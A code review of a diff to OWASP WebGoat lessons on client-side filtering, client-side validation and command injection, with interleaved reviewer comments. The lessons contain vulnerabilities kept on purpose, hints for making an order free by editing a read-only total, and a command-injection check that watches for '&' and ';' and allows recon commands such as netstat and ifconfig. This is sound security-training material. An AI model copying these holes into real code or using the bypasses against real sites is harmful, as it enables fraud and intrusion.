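Review bot: Both branches of `if (content.indexOf("[Managers/Manager/text()") != -1)` in `doStage2` add `stage2Content(s)`; only `makeSuccess(s)` is conditional, so the `else` is redundant and the block can be `if (content.indexOf("[Managers/Manager/text()") != -1) { makeSuccess(s); } ec.addElement(stage2Content(s));`. The check is a substring match on the JSP source, so the text appearing anywhere (including a comment) passes; if that looseness is acceptable for a lesson, a one-line comment saying so would stop the next maintainer from tightening it, e.g. `// loose check on purpose: any use of the Managers/Manager filter in the JSP counts as the fix`.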
@@ -219,22 +234,24 @@ public class ClientSideFiltering extends SequentialLessonAdapter { Table t1 = new Table().setCellSpacing(0).setCellPadding(2); - if (s.isColor()) { + if (s.isColor()) + { t1.setBorder(1); } TR tr = new TR(); - /*tr.addElement(new TD() - .addElement("Press 'Submit' when you believe you have completed the lesson.")); + /* + * tr.addElement(new TD() .addElement("Press 'Submit' when you believe you have + * completed the lesson.")); */ - Element b = ECSFactory - .makeButton("Click here when you believe you have completed the lesson."); + Element b = ECSFactory.makeButton("Click here when you believe you have completed the lesson."); tr.addElement(new TD(b).setAlign("CENTER")); t1.addElement(tr); ec.addElement(t1); - } catch (Exception e) { + } catch (Exception e) + { s.setMessage("Error generating " + this.getClass().getName()); e.printStackTrace(); } @@ -242,28 +259,25 @@ public class ClientSideFiltering extends SequentialLessonAdapter { return ec; } - protected Select createDropDown() { + protected Select createDropDown() + { Select select = new Select("UserSelect"); select.setID("UserSelect"); - org.apache.ecs.html.Option option = new org.apache.ecs.html.Option( - "Choose Employee", "0", "Choose Employee"); + org.apache.ecs.html.Option option = new org.apache.ecs.html.Option("Choose Employee", "0", "Choose Employee"); select.addElement(option); - option = new org.apache.ecs.html.Option("Larry Stooge", "101", - "Larry Stooge"); + option = new org.apache.ecs.html.Option("Larry Stooge", "101", "Larry Stooge"); select.addElement(option); - option = new org.apache.ecs.html.Option("Curly Stooge", "103", - "Curly Stooge"); + option = new org.apache.ecs.html.Option("Curly Stooge", "103", "Curly Stooge"); select.addElement(option); - option = new org.apache.ecs.html.Option("Eric Walker", "104", - "Eric Walker"); + option = new org.apache.ecs.html.Option("Eric Walker", "104", "Eric Walker"); select.addElement(option); 
@@ -271,28 +285,23 @@ public class ClientSideFiltering extends SequentialLessonAdapter { select.addElement(option); - option = new org.apache.ecs.html.Option("Jerry Mouse", "106", - "Jerry Mouse"); + option = new org.apache.ecs.html.Option("Jerry Mouse", "106", "Jerry Mouse"); select.addElement(option); - option = new org.apache.ecs.html.Option("David Giambi", "107", - "David Giambi"); + option = new org.apache.ecs.html.Option("David Giambi", "107", "David Giambi"); select.addElement(option); - option = new org.apache.ecs.html.Option("Bruce McGuirre", "108", - "Bruce McGuirre"); + option = new org.apache.ecs.html.Option("Bruce McGuirre", "108", "Bruce McGuirre"); select.addElement(option); - option = new org.apache.ecs.html.Option("Sean Livingston", "109", - "Sean Livingston"); + option = new org.apache.ecs.html.Option("Sean Livingston", "109", "Sean Livingston"); select.addElement(option); - option = new org.apache.ecs.html.Option("Joanne McDougal", "110", - "Joanne McDougal"); + option = new org.apache.ecs.html.Option("Joanne McDougal", "110", "Joanne McDougal"); select.addElement(option); @@ -304,7 +313,8 @@ public class ClientSideFiltering extends SequentialLessonAdapter { } - protected Category getDefaultCategory() { + protected Category getDefaultCategory() + { return Category.AJAX_SECURITY; } 
@@ -313,17 +323,16 @@ public class ClientSideFiltering extends SequentialLessonAdapter { * * @return The hints value */ - public List getHints(WebSession s) { + public List getHints(WebSession s) + { List hints = new ArrayList(); hints .add("The information displayed when an employee is choosen from the drop down menu is stored on the client side."); - hints - .add("Use Firebug to find where the information is stored on the client side."); + hints.add("Use Firebug to find where the information is stored on the client side."); - hints - .add("Examine the hidden table to see if there is anyone listed who is not in the drop down menu."); + hints.add("Examine the hidden table to see if there is anyone listed who is not in the drop down menu."); hints.add("Look in the last row of the hidden table."); 
@@ -333,31 +342,33 @@ public class ClientSideFiltering extends SequentialLessonAdapter { hints.add("The server uses an XPath query agasinst an XML database."); - hints - .add("The query currently returns all of the contents of the database."); + hints.add("The query currently returns all of the contents of the database."); hints .add("The query should only return the information of employees who are managed by Moe Stooge, who's userID is 102"); hints.add("Try using a filter operator."); - hints - .add("your filter operator shoiuld look something like: [Managers/Manager/text()="); + hints.add("your filter operator shoiuld look something like: [Managers/Manager/text()="); return hints; } - public String getInstructions(WebSession s) { + public String getInstructions(WebSession s) + { String instructions = ""; - if (getLessonTracker(s).getStage() == 1) { + if (getLessonTracker(s).getStage() == 1) + { instructions = "STAGE 1:\tYou are Moe Stooge, CSO of Goat Hills Financial. " + "You have access to everyone in the company's information, except the CEO, " + "Neville Bartholomew. Or at least you shouldn't have access to the CEO's information." + " For this exercise, " + "examine the contents of the page to see what extra information you can find."; - } else if (getLessonTracker(s).getStage() == 2) { + } + else if (getLessonTracker(s).getStage() == 2) + { instructions = "STAGE 2:\tNow, fix the problem. Modify the server to only return " + "results that Moe Stooge is allowed to see."; } @@ -366,7 +377,8 @@ public class ClientSideFiltering extends SequentialLessonAdapter { private final static Integer DEFAULT_RANKING = new Integer(10); - protected Integer getDefaultRanking() { + protected Integer getDefaultRanking() + { return DEFAULT_RANKING; } 
@@ -392,28 +404,37 @@ public class ClientSideFiltering extends SequentialLessonAdapter { * @return The title value */ - public String getTitle() { + public String getTitle() + { return ("LAB: Client Side Filtering"); } - private String getFileContent(String content) { + private String getFileContent(String content) + { BufferedReader is = null; StringBuffer sb = new StringBuffer(); - try { + try + { is = new BufferedReader(new FileReader(new File(content))); String s = null; - while ((s = is.readLine()) != null) { + while ((s = is.readLine()) != null) + { sb.append(s); } - } catch (Exception e) { + } catch (Exception e) + { e.printStackTrace(); - } finally { - if (is != null) { - try { + } finally + { + if (is != null) + { + try + { is.close(); - } catch (IOException ioe) { + } catch (IOException ioe) + { } } @@ -422,7 +443,8 @@ public class ClientSideFiltering extends SequentialLessonAdapter { return sb.toString(); } - public Element getCredits() { + public Element getCredits() + { return super.getCustomCredits("", ASPECT_LOGO); } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideValidation.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideValidation.java index fc48ebdb7..41010e813 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideValidation.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideValidation.java @@ -1,8 +1,8 @@ + package org.owasp.webgoat.lessons; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.html.A; 
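Review bot: `getFileContent` (`@@ -392` hunk) returns whatever was buffered when an exception interrupts the read, so a missing or unreadable JSP is indistinguishable from an empty one to the stage-2 check, and the `catch (IOException ioe) { }` on `close()` is silent; at minimum name it `ignored` with a reason, `catch (IOException ignored) { // close failure after a complete read is harmless }`. `readLine` also drops the line terminators, so `sb.append(s)` fuses tokens across lines — harmless for the current `indexOf` check but surprising for any other caller, worth a comment. `FileReader` reads in the platform charset; `new InputStreamReader(new FileInputStream(content), "UTF-8")` would make the result independent of the server's locale.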
@@ -21,58 +21,67 @@ import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; import org.owasp.webgoat.util.HtmlEncoder; -public class ClientSideValidation extends SequentialLessonAdapter { + +public class ClientSideValidation extends SequentialLessonAdapter +{ /** * Description of the Method - * + * * @param s * Description of the Parameter * @return Description of the Return Value */ - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0)); - + public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") + .addElement( + new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) + .setVspace(0)); private boolean stage1FirstVisit = true; private boolean stage2FirstVisit = true; - protected Element createContent(WebSession s) { + protected Element createContent(WebSession s) + { return super.createStagedContent(s); } - protected Element doStage1(WebSession s) { + protected Element doStage1(WebSession s) + { return evalStage1(s); } - protected Element doStage2(WebSession s) { + protected Element doStage2(WebSession s) + { return stage2Content(s); } - protected Element evalStage1(WebSession s) { + protected Element evalStage1(WebSession s) + { ElementContainer ec = new ElementContainer(); String param1 = s.getParser().getRawParameter("field1", ""); - //test success + // test success - if (param1.equalsIgnoreCase("platinum") - || param1.equalsIgnoreCase("gold") - || param1.equalsIgnoreCase("silver") - || param1.equalsIgnoreCase("bronze") - || param1.equalsIgnoreCase("pressone") - || param1.equalsIgnoreCase("presstwo")) { + if (param1.equalsIgnoreCase("platinum") || param1.equalsIgnoreCase("gold") || param1.equalsIgnoreCase("silver") + || param1.equalsIgnoreCase("bronze") || param1.equalsIgnoreCase("pressone") + || 
param1.equalsIgnoreCase("presstwo")) + { getLessonTracker(s).setStage(2); - //s.resetHintCount(); + // s.resetHintCount(); s.setMessage("Stage 1 completed."); // Redirect user to Stage2 content. ec.addElement(doStage2(s)); - } else { - if (!stage1FirstVisit) { + } + else + { + if (!stage1FirstVisit) + { s.setMessage("Keep looking for the coupon code."); } stage1FirstVisit = false; @@ -84,21 +93,18 @@ public class ClientSideValidation extends SequentialLessonAdapter { } - - protected Element stage1Content(WebSession s) { + protected Element stage1Content(WebSession s) + { ElementContainer ec = new ElementContainer(); - try { - - - ec.addElement(new Script() - .setSrc("javascript/clientSideValidation.js")); + try + { + ec.addElement(new Script().setSrc("javascript/clientSideValidation.js")); ec.addElement(new HR().setWidth("90%")); - ec.addElement(new Center().addElement(new H1() - .addElement("Shopping Cart"))); + ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart"))); ec.addElement(createQtyTable(s)); @@ -106,27 +112,26 @@ public class ClientSideValidation extends SequentialLessonAdapter { ec.addElement(new BR()); ec.addElement(new HR().setWidth("90%")); - - - } catch (Exception e) { + } catch (Exception e) + { s.setMessage("Error generating " + this.getClass().getName()); e.printStackTrace(); } return (ec); } - protected Element stage2Content(WebSession s) { + protected Element stage2Content(WebSession s) + { ElementContainer ec = new ElementContainer(); - try { + try + { - ec.addElement(new Script() - .setSrc("javascript/clientSideValidation.js")); + ec.addElement(new Script().setSrc("javascript/clientSideValidation.js")); ec.addElement(new HR().setWidth("90%")); - ec.addElement(new Center().addElement(new H1() - .addElement("Shopping Cart"))); + ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart"))); ec.addElement(createQtyTable(s)); 
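Review bot: `stage1FirstVisit` and `stage2FirstVisit` are instance fields mutated from request handling (`stage1FirstVisit = false;` in `evalStage1`), so if one `ClientSideValidation` object serves every session — the hunk does not show how lessons are instantiated, but the `WebSession` being passed into each call suggests the lesson itself is shared — the "first visit" state is shared across users and racy: one user's first visit suppresses the hint for everyone else. The flag belongs in per-session state (the lesson tracker, `getLessonTracker(s)`, or the `WebSession`), or at least the assumption should be written down: `// NOTE: per-instance, not per-user -- only correct if each session gets its own lesson object`.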
@@ -136,62 +141,63 @@ public class ClientSideValidation extends SequentialLessonAdapter { // test success - float grandTotal = s.getParser() - .getFloatParameter("GRANDTOT", 0.0f); + float grandTotal = s.getParser().getFloatParameter("GRANDTOT", 0.0f); - if (getTotalQty(s) > 0 && grandTotal == 0 && !stage2FirstVisit) { + if (getTotalQty(s) > 0 && grandTotal == 0 && !stage2FirstVisit) + { makeSuccess(s); - } else { + } + else + { - if (!stage2FirstVisit) { + if (!stage2FirstVisit) + { s.setMessage("Your order isn't free yet."); } stage2FirstVisit = false; } - } catch (Exception e) { + } catch (Exception e) + { s.setMessage("Error generating " + this.getClass().getName()); e.printStackTrace(); } return (ec); } - protected ElementContainer createTotalTable(WebSession s) { + protected ElementContainer createTotalTable(WebSession s) + { ElementContainer ec = new ElementContainer(); String param1 = s.getParser().getRawParameter("field1", ""); - String param2 = HtmlEncoder.encode(s.getParser().getRawParameter( - "field2", "4128 3214 0002 1999")); + String param2 = HtmlEncoder.encode(s.getParser().getRawParameter("field2", "4128 3214 0002 1999")); - Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0) - .setWidth("90%").setAlign("center"); + Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); - if (s.isColor()) { + if (s.isColor()) + { t.setBorder(1); } ec.addElement(new BR()); TR tr = new TR(); - tr.addElement(new TD() - .addElement("Total before coupon is applied:")); + tr.addElement(new TD().addElement("Total before coupon is applied:")); tr.addElement(new TD().addElement( - new Input(Input.TEXT, "SUBTOT", s.getParser() - .getStringParameter("SUBTOT", "0")).setReadOnly(true)) - .setAlign("right")); + new Input(Input.TEXT, "SUBTOT", s.getParser().getStringParameter("SUBTOT", + "0")) + .setReadOnly(true)).setAlign("right")); t.addElement(tr); tr = new TR(); - tr.addElement(new TD() - 
.addElement("Total to be charged to your credit card:")); + tr.addElement(new TD().addElement("Total to be charged to your credit card:")); - tr.addElement(new TD() - .addElement( - new Input(Input.TEXT, "GRANDTOT", s.getParser() - .getStringParameter("GRANDTOT", "0")) - .setReadOnly(true)).setAlign("right")); + tr.addElement(new TD().addElement( + new Input(Input.TEXT, "GRANDTOT", s.getParser() + .getStringParameter("GRANDTOT", "0")).setReadOnly(true)) + .setAlign("right")); t.addElement(tr); t.addElement(tr); @@ -201,8 +207,7 @@ public class ClientSideValidation extends SequentialLessonAdapter { t.addElement(tr); tr = new TR(); tr.addElement(new TD().addElement("Enter your credit card number:")); - tr.addElement(new TD().addElement(new Input(Input.TEXT, "field2", - param2))); + tr.addElement(new TD().addElement(new Input(Input.TEXT, "field2", param2))); t.addElement(tr); tr = new TR(); tr.addElement(new TD().addElement("Enter your coupon code:")); @@ -222,7 +227,8 @@ public class ClientSideValidation extends SequentialLessonAdapter { } - protected int getTotalQty(WebSession s) { + protected int getTotalQty(WebSession s) + { int quantity = 0; 
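Review bot: `t.addElement(tr); t.addElement(tr);` at the end of the `createTotalTable` hunk adds the same "Total to be charged" row object twice, which looks like a copy-paste slip; whether ECS renders it twice or dedupes it by registry key, the second call should go. `param2` (card number) is run through `HtmlEncoder.encode` but `param1` (coupon code) is not; if it is echoed into the coupon `Input` below (that line is outside the hunk), that is a reflected-XSS that the stage does not intend, so encode it the same way. The `grandTotal == 0` exact float compare is fine for the literal `0` the bypass sends, but a comment saying the lesson expects exactly "0" would prevent someone "fixing" it to a tolerance.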
@@ -234,36 +240,33 @@ public class ClientSideValidation extends SequentialLessonAdapter { return quantity; } - protected ElementContainer createQtyTable(WebSession s) { + protected ElementContainer createQtyTable(WebSession s) + { ElementContainer ec = new ElementContainer(); - Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1) - .setWidth("90%").setAlign("center"); + Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center"); - if (s.isColor()) { + if (s.isColor()) + { t.setBorder(1); } TR tr = new TR(); - tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now") - .setWidth("70%")); + tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("70%")); tr.addElement(new TH().addElement("Price").setWidth("10%")); tr.addElement(new TH().addElement("Quantity").setWidth("10%")); tr.addElement(new TH().addElement("Total").setWidth("10%")); t.addElement(tr); tr = new TR(); - tr - .addElement(new TD() - .addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry ")); - + tr.addElement(new TD().addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry ")); tr.addElement(new TD().addElement( - new Input(Input.TEXT, "PRC1", s.getParser().getStringParameter( - "PRC1", "69.99")).setSize(10).setReadOnly(true)).setAlign("right")); + new Input(Input.TEXT, "PRC1", s.getParser().getStringParameter("PRC1", + "69.99")) + .setSize(10).setReadOnly(true)).setAlign("right")); - Input input = new Input(Input.TEXT, "QTY1", s.getParser() - .getStringParameter("QTY1", "0")); + Input input = new Input(Input.TEXT, "QTY1", s.getParser().getStringParameter("QTY1", "0")); input.setOnKeyUp("updateTotals();"); input.setOnLoad("updateTotals();"); 
@@ -271,114 +274,102 @@ public class ClientSideValidation extends SequentialLessonAdapter { tr.addElement(new TD().addElement(input).setAlign("right")); - tr.addElement(new TD().addElement( - new Input(Input.TEXT, "TOT1", s.getParser().getStringParameter( - "TOT1", "0")).setSize(10).setReadOnly(true)).setAlign("right")); + tr.addElement(new TD() + .addElement( + new Input(Input.TEXT, "TOT1", s.getParser().getStringParameter("TOT1", "0")).setSize(10) + .setReadOnly(true)).setAlign("right")); t.addElement(tr); tr = new TR(); tr.addElement(new TD().addElement("Dynex - Traditional Notebook Case")); tr.addElement(new TD().addElement( - new Input(Input.TEXT, "PRC2", s.getParser().getStringParameter( - "PRC2", "27.99")).setSize(10).setReadOnly(true)).setAlign("right")); + new Input(Input.TEXT, "PRC2", s.getParser().getStringParameter("PRC2", + "27.99")) + .setSize(10).setReadOnly(true)).setAlign("right")); - input = new Input(Input.TEXT, "QTY2", s.getParser().getStringParameter( - "QTY2", "0")); + input = new Input(Input.TEXT, "QTY2", s.getParser().getStringParameter("QTY2", "0")); input.setOnKeyUp("updateTotals();"); input.setSize(10); tr.addElement(new TD().addElement(input).setAlign("right")); - tr.addElement(new TD().addElement( - new Input(Input.TEXT, "TOT2", s.getParser().getStringParameter( - "TOT2", "0")).setSize(10).setReadOnly(true)).setAlign("right")); + tr.addElement(new TD() + .addElement( + new Input(Input.TEXT, "TOT2", s.getParser().getStringParameter("TOT2", "0")).setSize(10) + .setReadOnly(true)).setAlign("right")); t.addElement(tr); tr = new TR(); - tr - .addElement(new TD() - .addElement("Hewlett-Packard - Pavilion Notebook with Intel® Centrino™")); - + tr.addElement(new TD().addElement("Hewlett-Packard - Pavilion Notebook with Intel® Centrino™")); tr.addElement(new TD().addElement( - new Input(Input.TEXT, "PRC3", s.getParser().getStringParameter( - "PRC3", "1599.99")).setSize(10).setReadOnly(true)) - .setAlign("right")); + new Input(Input.TEXT, "PRC3", 
s.getParser().getStringParameter("PRC3", + "1599.99")) + .setSize(10).setReadOnly(true)).setAlign("right")); - input = new Input(Input.TEXT, "QTY3", s.getParser().getStringParameter( - "QTY3", "0")); + input = new Input(Input.TEXT, "QTY3", s.getParser().getStringParameter("QTY3", "0")); input.setOnKeyUp("updateTotals();"); input.setSize(10); tr.addElement(new TD().addElement(input).setAlign("right")); - - tr.addElement(new TD().addElement( - new Input(Input.TEXT, "TOT3", s.getParser().getStringParameter( - "TOT3", "0")).setSize(10).setReadOnly(true)).setAlign("right")); + tr.addElement(new TD() + .addElement( + new Input(Input.TEXT, "TOT3", s.getParser().getStringParameter("TOT3", "0")).setSize(10) + .setReadOnly(true)).setAlign("right")); t.addElement(tr); tr = new TR(); - tr - .addElement(new TD() - .addElement("3 - Year Performance Service Plan $1000 and Over ")); + tr.addElement(new TD().addElement("3 - Year Performance Service Plan $1000 and Over ")); + tr.addElement(new TD().addElement( + new Input(Input.TEXT, "PRC4", s.getParser().getStringParameter("PRC4", + "299.99")) + .setSize(10).setReadOnly(true)).setAlign("right")); - tr - .addElement(new TD().addElement( - new Input(Input.TEXT, "PRC4", s.getParser() - .getStringParameter("PRC4", "299.99")).setSize(10) - .setReadOnly(true)).setAlign("right")); - - input = new Input(Input.TEXT, "QTY4", s.getParser().getStringParameter( - "QTY4", "0")); + input = new Input(Input.TEXT, "QTY4", s.getParser().getStringParameter("QTY4", "0")); input.setOnKeyUp("updateTotals();"); input.setSize(10); tr.addElement(new TD().addElement(input).setAlign("right")); - - tr.addElement(new TD().addElement( - new Input(Input.TEXT, "TOT4", s.getParser().getStringParameter( - "TOT4", "0")).setSize(10).setReadOnly(true)).setAlign("right")); + tr.addElement(new TD() + .addElement( + new Input(Input.TEXT, "TOT4", s.getParser().getStringParameter("TOT4", "0")).setSize(10) + .setReadOnly(true)).setAlign("right")); t.addElement(tr); 
ec.addElement(t); return ec; } - protected Category getDefaultCategory() { + protected Category getDefaultCategory() + { return Category.AJAX_SECURITY; } /** * Gets the hints attribute of the AccessControlScreen object - * + * * @return The hints value */ - public List getHints(WebSession s) - { + { List hints = new ArrayList(); - - - hints.add("Use Firebug to examine the JavaScript."); hints.add("Using Firebug, you can add breakpoints in the JavaScript."); - hints.add("Use Firebug to find the array of encrypted coupon codes, and " + - "step through the JavaScript to see the decrypted values."); + hints.add("Use Firebug to find the array of encrypted coupon codes, and " + + "step through the JavaScript to see the decrypted values."); hints.add("You can use Firebug to inspect (and modify) the HTML."); - hints.add("Use Firebug to remove the 'readonly' attribute from the input next to " + - "'The total charged to your credit card:' and set the value to 0."); - - + hints.add("Use Firebug to remove the 'readonly' attribute from the input next to " + + "'The total charged to your credit card:' and set the value to 0."); return hints; @@ -386,16 +377,19 @@ public class ClientSideValidation extends SequentialLessonAdapter { /** * Gets the instructions attribute of the WeakAccessControl object - * + * * @return The instructions value */ - public String getInstructions(WebSession s) { + public String getInstructions(WebSession s) + { String instructions = ""; - if (getLessonTracker(s).getStage() == 1) { + if (getLessonTracker(s).getStage() == 1) + { instructions = "STAGE 1:\tFor this exercise, your mission is to discover a coupon code to receive an unintended discount."; } - else if (getLessonTracker(s).getStage() == 2) { + else if (getLessonTracker(s).getStage() == 2) + { instructions = "STAGE 2:\tNow, try to get your entire order for free."; } return (instructions); 
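Review bot: The rendering of this hunk shows `- public List getHints(WebSession s)` and `- {` answered only by `+ {`, with no `+` line restoring the signature before `List hints = new ArrayList();`. If that is what the patch actually contains rather than an artifact of how the collapsed diff is displayed, the new file no longer declares `getHints` and will not compile; worth confirming against the full file. The remainder of the hunk is line wrapping and brace placement only.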
@@ -403,21 +397,23 @@ public class ClientSideValidation extends SequentialLessonAdapter { private final static Integer DEFAULT_RANKING = new Integer(120); - protected Integer getDefaultRanking() { + protected Integer getDefaultRanking() + { return DEFAULT_RANKING; } /** * Gets the title attribute of the AccessControlScreen object - * + * * @return The title value */ - public String getTitle() { + public String getTitle() + { return "Insecure Client Storage"; } public Element getCredits() - { - return super.getCustomCredits("", ASPECT_LOGO); - } + { + return super.getCustomCredits("", ASPECT_LOGO); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CommandInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CommandInjection.java index 0fd458fd7..fdc592aa3 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/CommandInjection.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CommandInjection.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons; import java.io.File; @@ -5,7 +6,6 @@ import java.util.ArrayList; import java.util.Arrays; import java.util.List; import java.util.StringTokenizer; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
@@ -17,337 +17,297 @@ import org.owasp.webgoat.session.WebSession; import org.owasp.webgoat.util.Exec; import org.owasp.webgoat.util.ExecResults; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Bruce Mayhew WebGoat - * @created October 28, 2003 + * + * @author Bruce Mayhew WebGoat + * @created October 28, 2003 */ public class CommandInjection extends LessonAdapter { - private final static String HELP_FILE = "HelpFile"; + private final static String HELP_FILE = "HelpFile"; - private String osName = System.getProperty("os.name"); + private String osName = System.getProperty("os.name"); - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - boolean illegalCommand = getWebgoatContext().isDefuseOSCommands(); - try + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) { - String helpFile = s.getParser().getRawParameter(HELP_FILE, - "BasicAuthentication.help"); - if (getWebgoatContext().isDefuseOSCommands() - && (helpFile.indexOf('&') != -1 || helpFile.indexOf(';') != -1)) - { - int index = helpFile.indexOf('&'); - if (index == -1) + ElementContainer ec = new ElementContainer(); + boolean illegalCommand = getWebgoatContext().isDefuseOSCommands(); + try { - index = helpFile.indexOf(';'); - } - index = index + 1; - int helpFileLen = helpFile.length() - 1; // subtract 1 for the closing quote - System.out.println("Command = 
[" - + helpFile.substring(index, helpFileLen).trim() - .toLowerCase() + "]"); - if ((osName.indexOf("Windows") != -1 && (helpFile.substring( - index, helpFileLen).trim().toLowerCase().equals( - "netstat -a") - || helpFile.substring(index, helpFileLen).trim() - .toLowerCase().equals("dir") - || helpFile.substring(index, helpFileLen).trim() - .toLowerCase().equals("ls") - || helpFile.substring(index, helpFileLen).trim() - .toLowerCase().equals("ifconfig") || helpFile - .substring(index, helpFileLen).trim().toLowerCase() - .equals("ipconfig"))) - || (helpFile.substring(index, helpFileLen).trim() - .toLowerCase().equals("netstat -a #") - || helpFile.substring(index, helpFileLen) - .trim().toLowerCase().equals("dir #") - || helpFile.substring(index, helpFileLen) - .trim().toLowerCase().equals("ls #") - || helpFile.substring(index, helpFileLen) - .trim().toLowerCase().equals("ls -l #") - || helpFile.substring(index, helpFileLen) - .trim().toLowerCase().equals( - "ifconfig #") || helpFile - .substring(index, helpFileLen).trim() - .toLowerCase().equals("ipconfig #"))) - { - illegalCommand = false; - } - else - { - s - .setMessage("It appears that you are on the right track. " - + "Commands that may compromise the operating system have been disabled. 
" - + "The following commands are allowed: netstat -a, dir, ls, ifconfig, and ipconfig"); - } - } + String helpFile = s.getParser().getRawParameter(HELP_FILE, "BasicAuthentication.help"); + if (getWebgoatContext().isDefuseOSCommands() + && (helpFile.indexOf('&') != -1 || helpFile.indexOf(';') != -1)) + { + int index = helpFile.indexOf('&'); + if (index == -1) + { + index = helpFile.indexOf(';'); + } + index = index + 1; + int helpFileLen = helpFile.length() - 1; // subtract 1 for the closing quote + System.out.println("Command = [" + helpFile.substring(index, helpFileLen).trim().toLowerCase() + "]"); + if ((osName.indexOf("Windows") != -1 && (helpFile.substring(index, helpFileLen).trim().toLowerCase() + .equals("netstat -a") + || helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("dir") + || helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("ls") + || helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("ifconfig") || helpFile + .substring(index, helpFileLen).trim().toLowerCase().equals("ipconfig"))) + || (helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("netstat -a #") + || helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("dir #") + || helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("ls #") + || helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("ls -l #") + || helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("ifconfig #") || helpFile + .substring(index, helpFileLen).trim().toLowerCase().equals("ipconfig #"))) + { + illegalCommand = false; + } + else + { + s.setMessage("It appears that you are on the right track. " + + "Commands that may compromise the operating system have been disabled. 
" + + "The following commands are allowed: netstat -a, dir, ls, ifconfig, and ipconfig"); + } + } - if (getWebgoatContext().isDefuseOSCommands() && helpFile.indexOf('&') == -1 - && helpFile.indexOf(';') == -1) - { - if (helpFile.length() > 0) - { - if (upDirCount(helpFile) <= 3) - { - // FIXME: This value isn't used. What is the goal here? - s.getContext().getRealPath("/"); - illegalCommand = false; - } - else - { - s - .setMessage("It appears that you are on the right track. " - + "Commands that may compromise the operating system have been disabled. " - + "This lesson is a command injection lesson, not access control."); - } - } - else - { - // No Command entered. - illegalCommand = false; - } - } - File safeDir = new File(s.getContext().getRealPath("/lesson_plans")); + if (getWebgoatContext().isDefuseOSCommands() && helpFile.indexOf('&') == -1 && helpFile.indexOf(';') == -1) + { + if (helpFile.length() > 0) + { + if (upDirCount(helpFile) <= 3) + { + // FIXME: This value isn't used. What is the goal here? + s.getContext().getRealPath("/"); + illegalCommand = false; + } + else + { + s.setMessage("It appears that you are on the right track. " + + "Commands that may compromise the operating system have been disabled. " + + "This lesson is a command injection lesson, not access control."); + } + } + else + { + // No Command entered. + illegalCommand = false; + } + } + File safeDir = new File(s.getContext().getRealPath("/lesson_plans")); - ec - .addElement(new StringElement( - "You are currently viewing: " - + (helpFile.toString().length() == 0 ? "<select file from list below>" - : helpFile.toString()) + "")); + ec.addElement(new StringElement("You are currently viewing: " + + (helpFile.toString().length() == 0 ? 
